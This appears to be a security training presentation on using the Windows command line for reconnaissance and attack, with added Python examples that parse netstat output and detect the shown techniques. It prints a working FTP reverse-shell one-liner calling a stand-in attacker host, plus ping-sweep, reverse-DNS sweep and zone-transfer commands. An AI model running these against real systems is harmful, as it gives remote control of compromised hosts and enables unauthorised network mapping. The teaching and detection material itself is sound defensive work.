begood

Hacking Without Tools: Windows

Chris Clymer, CISSP

ChrisClymer.com/articles/hacking_windows

Who am I?

  • I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCA
  • I'm not even very good at Minesweeper
  • I'm a UNIX geek
  • I love the command line
  • How much you ask?
  • This entire presentation was created by writing out HTML markup by hand in the Vim text editor

Why are you getting Windows tips from a UNIX guy?

  • It turns out that for some reason, not every system runs UNIX
  • In fact, the ones we're most concerned about in Information Security are often running Windows (strange!)
  • Bearded UNIX guys need to get cozy in the WIN32 world
  • Windows veterans benefit from learning to better leverage their OS's CLI
  • This presentation could also be called "How I learned to stop installing CYGWIN and love command.exe"

Why hack without your tools?

  • You can't always guarantee that you'll have your toolbox available
  • Relying on your tools can limit you
  • You want to impress women with your leet CLI skills
  • The vast majority of the commands I will show you today should work on a typical modern Windows installation

Our friend command.exe

  • This lab will focus on command.exe
  • Powershell, VB, and WMIC are all powerful tools...but command.exe is the least common denominator on all Windows platforms
  • You can launch it by going to Start -> Run -> cmd

Our Building Blocks

  • find /i "foo" file - searches through the file "file" for the string "foo". The "/i" makes the search case-insensitive
  • ping -n 5 host - sends 5 ICMP echo requests to host
  • telnet host port - spawns an interactive telnet session to host. If port is specified, it is used instead of the default Telnet port of 23

Command Control and Redirection

  • command1 & command2 - Run command1 and then command2
  • command1 && command2 - Run command2 only if command1 runs successfully
  • command1 || command2 - Run command2 only if command1 does NOT run successfully
  • command > "output.txt" - Redirect the output of command to the file "output.txt", creating the file if it does not exist (and overwriting it if it does)
  • command >> "output.txt" - Append the output of command to the end of the file "output.txt"
  • command1 | command2 - Pipe the output of command1 into command2
  • command 2> errors.txt - Redirect the error output (stderr) of command to the file "errors.txt"

System Reconnaissance

  • set - show environment variables
  • net user - show local users
  • net localgroup - show local groups
  • sc query - list running services
  • sc query state= all - list all services
  • wmic process list full - show details on all running processes
  • tasklist /svc - show all running processes and their associated services

Network Reconnaissance

  • netstat -nao - show all current network activity, including PIDs
  • netsh firewall show config - display the Windows firewall configuration
  • ipconfig /displaydns - systems this host has recently resolved through DNS
  • arp -a - systems on the same subnet this host has recently communicated with
  • nslookup - all-purpose DNS query tool
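As an added example (not part of the original lab): a small Python parser that joins the listening sockets reported by netstat -nao to the owning process and hosted services reported by tasklist /svc, which is the triage a defender would do with the same two commands from the System and Network Reconnaissance sections. The two command outputs below are constructed samples, not real captures.

```python
import re
# Constructed sample outputs (not real captures) of "netstat -nao" and "tasklist /svc".
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    10.10.10.5:49712       10.10.10.20:25         ESTABLISHED     3120
  TCP    [::]:3389              [::]:0                 LISTENING       1204
  UDP    0.0.0.0:137            *:*                                    4
"""
TASKLIST_SAMPLE = """
Image Name                     PID Services
========================= ======== ============================================
System                           4 N/A
svchost.exe                    884 RpcEptMapper, RpcSs
svchost.exe                   1204 TermService
"""

def parse_netstat(text):
    """Rows of netstat -nao as dicts; UDP rows have no State column, so PID is last."""
    rows = []
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # skip the header and blank lines
        rows.append({"proto": parts[0], "local": parts[1], "remote": parts[2],
                     "state": parts[3] if parts[0] == "TCP" else "", "pid": int(parts[-1])})
    return rows

def parse_tasklist_svc(text):
    """Map PID -> (image name, hosted services) from tasklist /svc output."""
    procs = {}
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+(\d+)\s+(.*)$", line.strip())  # header/rule lines don't match
        if m:
            svc = m.group(3).strip()
            procs[int(m.group(2))] = (m.group(1), [] if svc == "N/A" else svc.split(", "))
    return procs

def listening_ports(netstat_text, tasklist_text):
    """Join each listening socket to the process and Windows services behind it."""
    procs = parse_tasklist_svc(tasklist_text)
    result = []
    for r in parse_netstat(netstat_text):
        if r["proto"] == "TCP" and r["state"] != "LISTENING":
            continue  # established/outbound sockets are not what we are inventorying
        port = int(r["local"].rsplit(":", 1)[1])  # rsplit also handles [::]:3389
        image, services = procs.get(r["pid"], ("<unknown>", []))
        result.append((r["proto"], port, r["pid"], image, services))
    return sorted(result)
```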

Let's Try One

  • Clear your DNS cache: ipconfig /flushdns
  • ipconfig /displaydns should now only show your localhost

Let's Try One

  • Now let's add an entry: ping google.com
  • Another ipconfig /displaydns should show the new entry for google.com

More on Nslookup

  • nslookup somehost - looks up that host in DNS using your localhost's DNS configuration
  • nslookup - starts nslookup in interactive mode
  • set type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR.
  • ls -d example.com - if the server allows it, does a zone transfer of example.com
  • ls -t example.com - will give a list of member servers from the domain

Fun with Telnet!

  • Telnet is just an outdated, insecure remote administration tool right?
  • What happens when you telnet to a port other than 23?
  • Turns out many protocols are simple enough to interact with over telnet
  • Telnet can stand in for Netcat for 1-way communication with remote hosts

Lets test out some HTTP

  • You won't be able to see what you're typing once you've started telnet
  • First type GET /index.html HTTP/1.1 and hit return

Lets test out some HTTP

  • You should see something like the response below

Lets test out some BAD HTTP

  • This time we'll type GET blah
  • This time we get an error page since we're not passing a valid HTTP query. This is often more helpful, as many HTTP servers happily provide useful information in their error pages

What about SMTP?

  • Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25
  • Now that we're talking to the server, we'll start the session by typing EHLO and then hitting enter
  • Type quit when you are ready to end the session
  • If you know your SMTP syntax, you can send email this way

Telnet isn't the only choice

  • Many default Windows CLI apps can interact with a network
  • Many of these offer shell-like functionality and flexibility
  • These apps can fill your Netcat niche when uploading nc.exe isn't an option

Reverse shell using FTP

echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >> ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt & echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L %i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F "delims=^" %j in (commands.txt) do cmd.exe /c %j 1>output.txt & del commands.txt) & ping -n 4 127.0.0.1)

Explanation of FTP Reverse Shell

  • This command will be run on a compromised host
  • The command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw"
  • Next it will upload the content of "output.txt" to evilhost
  • Finally it will download "commands.txt" from evilhost, and run whatever is inside
  • All of this is done in an infinite loop
  • As long as the commands in "commands.txt" direct their output to "output.txt", evilhost will get the results

Lets Talk About Loops

  • FOR /L - these loops are counters:
  • FOR /L %i in (1,1,10) do echo "Hello World" - prints "Hello World" 10 times
  • FOR /F - these loops are iterators
  • FOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line

Neat Shell Control Tricks

  • FOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0
  • ping -n 4 127.0.0.1 - effectively "sleep 4". The Windows shell has no "sleep" command, so a local ping can stand in for it

Network Scanning with Ping

  • FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
  • This command will ping every host from 10.10.10.1 - 10.10.10.255
  • By using find to parse through the results for "Reply" we only see the hosts which are responding
  • By using @ping we prevent the ping commands themselves from showing in the terminal

Reverse DNS Lookups

  • FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name"
  • Once again we're iterating through all hosts in the 10.10.10.0/24 network
  • This time we will first echo each host's IP to the terminal
  • Next we'll run the nslookup command for each IP, suppressing both the command and its errors...all we get is the good output!
  • Searching through the results for "Name" gets us the part we care about
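As an added example (not from the original presentation): Python detection logic, run over constructed process-creation records, that flags the command-line patterns behind the FTP reverse shell, the FOR /L ping sweep and the reverse-DNS sweep described above, from a defender's side of the fence. The record format, user names and host names are constructed for the example.

```python
import re

# Constructed process-creation records (not real logs): "event|user|command line".
LOG = r"""
4688|CORP\jdoe|cmd.exe /c for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
4688|CORP\jdoe|ipconfig /displaydns
4688|CORP\svc_backup|cmd.exe /c echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >> ftp.txt & for /L %i in (1,0,2) do (ftp -n -s:ftp.txt & for /F "delims=^" %j in (commands.txt) do cmd.exe /c %j >output.txt & ping -n 4 127.0.0.1)
4688|CORP\jdoe|FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name"
4688|CORP\admin|ftp files.corp.example
""".strip().splitlines()

# Each rule is (name, regex) keyed to one cmd.exe trick from the slides above.
RULES = [
    ("scripted ftp session (-s:file)", r"\bftp(\.exe)?\s[^&|]*-s:\S+"),
    ("cmd /c executing lines read from a file", r"for\s+/F\b.*\bcmd(\.exe)?\s+/c\s+%\w"),
    ("infinite FOR /L loop (step 0)", r"for\s+/L\s+%\w+\s+in\s*\(\s*\d+\s*,\s*0\s*,"),
    ("ping sweep via FOR /L", r"for\s+/L\b.*\bping\s+-n\s+1\s+\S*%\w"),
    ("reverse-DNS sweep via FOR /L", r"for\s+/L\b.*\bnslookup\s+\S*%\w"),
]

def scan(lines):
    """One entry per record that trips at least one rule: (user, matched rule names)."""
    hits = []
    for line in lines:
        event, user, cmd = line.split("|", 2)  # the command line may itself contain '|'
        matched = [name for name, pat in RULES if re.search(pat, cmd, re.IGNORECASE)]
        if matched:
            hits.append((user, matched))
    return hits

def high_confidence(hits, min_rules=2):
    """Records where a single command line tripped several rules at once (e.g. the FTP loop)."""
    return [(user, rules) for user, rules in hits if len(rules) >= min_rules]
```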

Other Useful Commands

  • type - show the contents of a file
  • openfiles /local on - enable openfiles logging (requires a reboot)
  • openfiles /query /v - show details on all open files
  • reg query [KeyName] - display value of registry key [KeyName]
  • net use - mount a file share

Resources

SANS 560

  • If you found this lab useful, I strongly recommend taking Ed Skoudis's SANS 560 course
  • Ed is the best resource I have found for this sort of usage of the Windows CLI
  • Much of this lab was based on my experience taking the 560 course
  • Ed's 1-day Windows Scripting course covers this material as well
  • Plus he's got much better war stories than I do!

Hacking From the Windows Command Line
